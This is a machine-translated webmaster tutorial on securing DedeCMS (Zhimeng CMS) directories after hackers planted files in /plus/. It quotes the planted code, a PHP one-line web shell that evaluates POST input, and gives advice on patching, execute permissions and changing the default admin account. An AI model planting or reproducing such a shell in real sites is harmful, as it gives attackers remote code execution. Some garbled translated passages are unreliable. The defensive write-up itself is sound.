Zhimeng cms Directory security permission configuration tutorial

Based on my website's experiences similar to those of others, the files written by hackers mainly exist in the/plus/Folder. Currently, several known files include ga. php, log. php, B. php, b1.php, and so on. The File features short content and few content. It may not be very convenient to write, but the functions of these codes are indeed not small.

Below is some code in the ga. Php file:

The code is as follows:	Copy code
<Title> login </title> no <? Php Eval ($ _ POST [1]) ?> <Title> login </title> no <? Php Eval ($ _ POST [1]) ?> <Title> login </title> no <? Php Eval ($ _ POST [1]) ?>

The actual code is longer than the code intercepted above, but it is a repetition of this code, as for log. php code, similar to this one, has only one sentence, simple and clear. If you have a little understanding of network security, you will know that it is a php one-sentence Trojan. You can execute this code using some specified tools, password cracking is expected.

Since we already know what vulnerabilities the other party uses and how the other party uses them to exploit the vulnerabilities, how can we prevent these dangerous events? After querying a large amount of information, I initially sorted out the following steps to prevent the use of vulnerabilities, hoping to help webmasters who are also applicable to dedecms.

I. Patch and set directory permissions in the upgraded version

This is an official solution to this problem. No matter what version of dedecms you are using, you must update the patch automatically in the background. This is the most important step to prevent the vulnerability from being exploited; at the same time, the official website also provides directory setting methods, mainly to set data, templets, uploads, and a as read/write permissions that cannot be executed; include, member, plus, and background management directories are set to execute readable and write permissions. To delete the install and special directories, see the official instructions for how to set them.

2. Change the admin account and password

Hackers may use the default admin account and then speculate that the password is used for cracking. Therefore, it is very important to modify the default admin account. There are many methods to modify the default admin account, it is more effective to log on to the website database with phpadmin, find the dede_admin database table (dede is the database table prefix), modify the userid and pwd items, and change the password to f297a57a5a743894a0e4, this is the default password admin. After modification, log on to the background and change the password after logging on to the background of dede.

3. Other important points

As for more details, we should also note that we should try not to choose a space that is too cheap. A space that is too cheap may easily cause security problems on the server itself, as long as there is a problem on the server, the website under the server is no longer saved. In the token, the administrator password should be changed at least once a month to avoid being inferred from the same password as other accounts.